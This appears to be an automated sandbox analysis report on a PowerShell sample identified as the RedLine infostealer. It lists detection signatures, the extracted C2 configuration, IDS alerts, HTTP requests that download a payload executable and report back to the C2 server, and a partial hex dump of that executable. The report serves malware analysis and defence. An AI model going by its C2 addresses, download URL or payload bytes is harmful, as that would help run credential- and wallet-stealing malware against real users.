Windows Analysis Report
xenn.ps1

Overview

General Information

Sample name: xenn.ps1
Analysis ID: 1645513
MD5: 00ec3a2c7aacb1b209de910530df1df8
SHA1: 87737df623fac9728ca4f139b050446c473c397b
SHA256: aa97c2b1a6c1c6f2066bea8eefb56008cbe3c5ff35972eecdebde28d964e9ab7
Tags: opendirps1user-skocherhan
Infos:

Detection

RedLine
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected RedLine Stealer
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Powershell drops PE file
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Name Description Attribution Blogpost URLs Link
RedLine Stealer RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

AV Detection
barindex
Found malware configuration
Source: 3.2.VZCXGHSDSD.exe.400000.0.unpack Malware Configuration Extractor: RedLine {"C2 url": ["176.65.144.135:65012"], "Bot Id": "MAr2025"}
Multi AV Scanner detection for submitted file
Source: xenn.ps1 ReversingLabs: Detection: 13%
Source: xenn.ps1 Virustotal: Detection: 14% Perma Link
Joe Sandbox ML detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 104.26.13.31:443 -> 192.168.2.5:49724 version: TLS 1.0
Source: Binary string: QAWAS23232.pdb source: VZCXGHSDSD.exe, 00000002.00000000.1303782935.00000000004D2000.00000002.00000001.01000000.00000007.sdmp, VZCXGHSDSD.exe.0.dr
Source: Binary string: QAWAS23232.pdbT source: VZCXGHSDSD.exe, 00000002.00000000.1303782935.00000000004D2000.00000002.00000001.01000000.00000007.sdmp, VZCXGHSDSD.exe.0.dr

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 1800000 - Severity 1 - Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect : 192.168.2.5:49723 -> 176.65.144.135:65012
Source: Network traffic Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.5:49723 -> 176.65.144.135:65012
Source: Network traffic Suricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.5:49725 -> 176.65.144.135:65012
Source: Network traffic Suricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 176.65.144.135:65012 -> 192.168.2.5:49723
Source: Network traffic Suricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.5:49723 -> 176.65.144.135:65012
Source: Network traffic Suricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 176.65.144.135:65012 -> 192.168.2.5:49723
Source: Network traffic Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 176.65.144.135:65012 -> 192.168.2.5:49723
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 176.65.144.135:65012
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 176.65.144.135 ports 65012,0,1,2,5,6
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 65012
Source: unknown Network traffic detected: HTTP traffic on port 65012 -> 49723
Source: unknown Network traffic detected: HTTP traffic on port 65012 -> 49723
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 65012
Source: unknown Network traffic detected: HTTP traffic on port 65012 -> 49723
Source: unknown Network traffic detected: HTTP traffic on port 65012 -> 49723
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 65012
Source: unknown Network traffic detected: HTTP traffic on port 65012 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 65012 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 65012
Source: unknown Network traffic detected: HTTP traffic on port 65012 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 65012 -> 49725
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.5:49723 -> 176.65.144.135:65012
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 21 Mar 2025 19:59:05 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Tue, 18 Mar 2025 22:09:57 GMTETag: "17e00-630a52a50e7eb"Accept-Ranges: bytesContent-Length: 97792Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a2 a9 0c f0 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 74 01 00 00 08 00 00 00 00 00 00 3e 93 01 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 01 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 92 01 00 53 00 00 00 00 a0 01 00 de 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 73 01 00 00 20 00 00 00 74 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 de 04 00 00 00 a0 01 00 00 06 00 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 01 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 93 01 00 00 00 00 00 48 00 00 00 02 00 05 00 b4 af 00 00 34 e3 00 00 03 00 00 00 43 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 09 00 20 03 00 00 01 00 00 11 73 01 00 00 0a 0a 02 7e 03 00 00 04 25 2d 17 26 7e 02 00 00 04 fe 06 10 00 00 06 73 02 00 00 0a 25 80 03 00 00 04 28 01 00 00 2b 6f 04 00 00 0a 0b 38 cc 02 00 00 07 6f 05 00 00 0a 17 17 19 8d 08 00 00 01 25 16 1f 0a 8d 09 00 00 01 25 d0 0a 01 00 04 28 06 00 00 0a 73 07 00 00 0a a2 25 17 1e 8d 09 00 00 01 25 d0 02 01 00 04 28 06 00 00 0a 73 07 00 00 0a a2 25 18 1d 8d 09 00 00 01 25 d0 07 01 00 04 28 06 00 00 0a 73 07 00 00 0a a2 28 01 01 00 06 6f 08 00 00 0a 0c 38 46 02 00 00 12 02 28 09 00 00 0a 0d 73 09 00 00 06 13 04 73 2c 01 00 06 13 05 11 04 7e 0a 00 00 0a 7d 01 00 00 04 7e 0a 00 00 0a 13 06 11 04 09 73 0b 00 00 0a 28 0c 00 00 0a 6f 0d 00 00 0a 7d 01 00 00 04 11 04 7b 01 00 00 04 1f 0f 8d 09 00 00 01 25 d0 12 01 00 04 28 06 00 00 0a 73 07 00 00 0a 6f 0e 00 00 0a 2c 1a 1e 8d 09 00 00 01 25 d0 fd 00 00 04 28 06 00 00 0a 73 07 00 00 0a 13
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /geoip HTTP/1.1Host: api.ip.sbConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /dev/xenbuild.exe HTTP/1.1Host: 176.65.144.3Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 176.65.144.135:65012Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 176.65.144.135:65012Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 176.65.144.135:65012Content-Length: 958701Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 176.65.144.135:65012Content-Length: 958693Expect: 100-continueAccept-Encoding: gzip, deflate
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 104.26.13.31 104.26.13.31
Source: Joe Sandbox View IP Address: 176.65.144.3 176.65.144.3
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: PALTEL-ASPALTELAutonomousSystemPS PALTEL-ASPALTELAutonomousSystemPS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 104.26.13.31:443 -> 192.168.2.5:49724 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown TCP traffic detected without corresponding DNS query: 176.65.144.135
Source: unknown TCP traffic detected without corresponding DNS query: 176.65.144.135
Source: unknown TCP traffic detected without corresponding DNS query: 176.65.144.135
Source: unknown TCP traffic detected without corresponding DNS query: 176.65.144.135
Source: unknown TCP traffic detected without corresponding DNS query: 176.65.144.135
Source: unknown TCP traffic detected without corresponding DNS query: 176.65.144.135
Source: global traffic HTTP traffic detected: GET /geoip HTTP/1.1Host: api.ip.sbConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /dev/xenbuild.exe HTTP/1.1Host: 176.65.144.3Connection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: api.ip.sb
Source: unknown HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 176.65.144.135:65012Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: VZCXGHSDSD.exe, 00000003.00000002.1482861241.0000000003163000.00000004.00000800.00020000.00000000.sdmp, VZCXGHSDSD.exe, 00000003.00000002.1482861241.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, VZCXGHSDSD.exe, 00000003.00000002.1482861241.00000000030BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://176.65.144.135:65012
Source: VZCXGHSDSD.exe, 00000003.00000002.1482861241.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://176.65.144.135:65012/
Source: VZCXGHSDSD.exe, 00000002.00000002.1329670167.00000000028ED000.00000004.00000800.00020000.00000000.sdmp, VZCXGHSDSD.exe, 00000002.00000002.1329670167.00000000028F6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://176.65.144.3
Source: VZCXGHSDSD.exe, 00000002.00000002.1329670167.0000000002884000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://176.65.144.3/dev/xenbuild.exe
Source: VZCXGHSDSD.exe, 00000002.00000002.1329670167.0000000002888000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://176.65.144.3/dev/xenbuild.exeP
Source: powershell.exe, 00000000.00000002.1309633989.0000000005A1E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1306544682.0000000004B06000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: VZCXGHSDSD.exe, 00000003.00000002.1482861241.00000000030BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: VZCXGHSDSD.exe, 00000003.00000002.1482861241.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: VZCXGHSDSD.exe, 00000003.00000002.1482861241.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, VZCXGHSDSD.exe, 00000003.00000002.1482861241.0000000003013000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: VZCXGHSDSD.exe, 00000003.00000002.1482861241.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: VZCXGHSDSD.exe, 00000003.00000002.1482861241.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
Source: VZCXGHSDSD.exe, 00000003.00000002.1482861241.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: powershell.exe, 00000000.00000002.1306544682.00000000049B1000.00000004.00000800.00020000.00000000.sdmp, VZCXGHSDSD.exe, 00000002.00000002.1329670167.00000000028ED000.00000004.00000800.00020000.00000000.sdmp, VZCXGHSDSD.exe, 00000003.00000002.1482861241.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: VZCXGHSDSD.exe, 00000003.00000002.1482861241.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, VZCXGHSDSD.exe, 00000003.00000002.1482861241.0000000003031000.00000004.00000800.00020000.00000000.sdmp, VZCXGHSDSD.exe, 00000003.00000002.1482861241.0000000003013000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/
Source: VZCXGHSDSD.exe, 00000003.00000002.1482861241.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/0
Source: VZCXGHSDSD.exe, 00000003.00000002.1482861241.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
Source: VZCXGHSDSD.exe, 00000003.00000002.1482861241.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
Source: VZCXGHSDSD.exe, 00000003.00000002.1482861241.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, VZCXGHSDSD.exe, 00000003.00000002.1482861241.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
Source: VZCXGHSDSD.exe, 00000003.00000002.1482861241.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
Source: VZCXGHSDSD.exe, 00000003.00000002.1482861241.0000000003163000.00000004.00000800.00020000.00000000.sdmp, VZCXGHSDSD.exe, 00000003.00000002.1482861241.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
Source: VZCXGHSDSD.exe, 00000003.00000002.1482861241.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
Source: VZCXGHSDSD.exe, 00000003.00000002.1482861241.00000000030BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
Source: VZCXGHSDSD.exe, 00000003.00000002.1482861241.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
Source: VZCXGHSDSD.exe, 00000003.00000002.1482861241.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
Source: VZCXGHSDSD.exe, 00000003.00000002.1482861241.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: powershell.exe, 00000000.00000002.1306544682.0000000004B06000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: tmp543.tmp.3.dr String found in binary or memory: https://ac.ecosia.org?q=
Source: powershell.exe, 00000000.00000002.1306544682.00000000049B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: VZCXGHSDSD.exe, VZCXGHSDSD.exe, 00000003.00000002.1480927097.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: VZCXGHSDSD.exe, VZCXGHSDSD.exe, 00000003.00000002.1480927097.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
Source: tmp543.tmp.3.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: VZCXGHSDSD.exe, 00000003.00000002.1487495570.0000000004143000.00000004.00000800.00020000.00000000.sdmp, VZCXGHSDSD.exe, 00000003.00000002.1487495570.00000000043AB000.00000004.00000800.00020000.00000000.sdmp, tmp554.tmp.3.dr, tmpCE61.tmp.3.dr, tmpCE20.tmp.3.dr, tmp96D0.tmp.3.dr, tmpCE0F.tmp.3.dr, tmpCE72.tmp.3.dr, tmpCE30.tmp.3.dr, tmp532.tmp.3.dr, tmpCE41.tmp.3.dr, tmp96E1.tmp.3.dr, tmp555.tmp.3.dr, tmp543.tmp.3.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: VZCXGHSDSD.exe, 00000003.00000002.1487495570.0000000004143000.00000004.00000800.00020000.00000000.sdmp, VZCXGHSDSD.exe, 00000003.00000002.1487495570.00000000043AB000.00000004.00000800.00020000.00000000.sdmp, tmp554.tmp.3.dr, tmpCE61.tmp.3.dr, tmpCE20.tmp.3.dr, tmp96D0.tmp.3.dr, tmpCE0F.tmp.3.dr, tmpCE72.tmp.3.dr, tmpCE30.tmp.3.dr, tmp532.tmp.3.dr, tmpCE41.tmp.3.dr, tmp96E1.tmp.3.dr, tmp555.tmp.3.dr, tmp543.tmp.3.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000000.00000002.1309633989.0000000005A1E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1309633989.0000000005A1E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1309633989.0000000005A1E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: tmp543.tmp.3.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: VZCXGHSDSD.exe, 00000003.00000002.1487495570.0000000004143000.00000004.00000800.00020000.00000000.sdmp, VZCXGHSDSD.exe, 00000003.00000002.1487495570.00000000043AB000.00000004.00000800.00020000.00000000.sdmp, tmp554.tmp.3.dr, tmpCE61.tmp.3.dr, tmpCE20.tmp.3.dr, tmp96D0.tmp.3.dr, tmpCE0F.tmp.3.dr, tmpCE72.tmp.3.dr, tmpCE30.tmp.3.dr, tmp532.tmp.3.dr, tmpCE41.tmp.3.dr, tmp96E1.tmp.3.dr, tmp555.tmp.3.dr, tmp543.tmp.3.dr String found in binary or memory: https://duckduckgo.com/chrome_newtabv209h
Source: tmp543.tmp.3.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: tmp543.tmp.3.dr String found in binary or memory: https://gemini.google.com/app?q=
Source: powershell.exe, 00000000.00000002.1306544682.0000000004B06000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: VZCXGHSDSD.exe, VZCXGHSDSD.exe, 00000003.00000002.1480927097.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: powershell.exe, 00000000.00000002.1309633989.0000000005A1E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: VZCXGHSDSD.exe, 00000003.00000002.1487495570.0000000004143000.00000004.00000800.00020000.00000000.sdmp, VZCXGHSDSD.exe, 00000003.00000002.1487495570.00000000043AB000.00000004.00000800.00020000.00000000.sdmp, tmp554.tmp.3.dr, tmpCE61.tmp.3.dr, tmpCE20.tmp.3.dr, tmp96D0.tmp.3.dr, tmpCE0F.tmp.3.dr, tmpCE72.tmp.3.dr, tmpCE30.tmp.3.dr, tmp532.tmp.3.dr, tmpCE41.tmp.3.dr, tmp96E1.tmp.3.dr, tmp555.tmp.3.dr, tmp543.tmp.3.dr String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: VZCXGHSDSD.exe, 00000003.00000002.1487495570.0000000004143000.00000004.00000800.00020000.00000000.sdmp, VZCXGHSDSD.exe, 00000003.00000002.1487495570.00000000043AB000.00000004.00000800.00020000.00000000.sdmp, tmp554.tmp.3.dr, tmpCE61.tmp.3.dr, tmpCE20.tmp.3.dr, tmp96D0.tmp.3.dr, tmpCE0F.tmp.3.dr, tmpCE72.tmp.3.dr, tmpCE30.tmp.3.dr, tmp532.tmp.3.dr, tmpCE41.tmp.3.dr, tmp96E1.tmp.3.dr, tmp555.tmp.3.dr, tmp543.tmp.3.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: dump.pcap, type: PCAP Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 2.2.VZCXGHSDSD.exe.28ffc68.1.unpack, type: UNPACKEDPE Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 2.2.VZCXGHSDSD.exe.4099590.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 2.2.VZCXGHSDSD.exe.4099590.4.unpack, type: UNPACKEDPE Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 2.2.VZCXGHSDSD.exe.4099590.4.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 2.2.VZCXGHSDSD.exe.29044b8.3.raw.unpack, type: UNPACKEDPE Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 2.2.VZCXGHSDSD.exe.29044b8.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 2.2.VZCXGHSDSD.exe.28ffc68.1.raw.unpack, type: UNPACKEDPE Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 2.2.VZCXGHSDSD.exe.28ffc68.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 3.2.VZCXGHSDSD.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 3.2.VZCXGHSDSD.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 3.2.VZCXGHSDSD.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 2.2.VZCXGHSDSD.exe.29044b8.3.unpack, type: UNPACKEDPE Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 2.2.VZCXGHSDSD.exe.4099590.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 2.2.VZCXGHSDSD.exe.4099590.4.raw.unpack, type: UNPACKEDPE Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
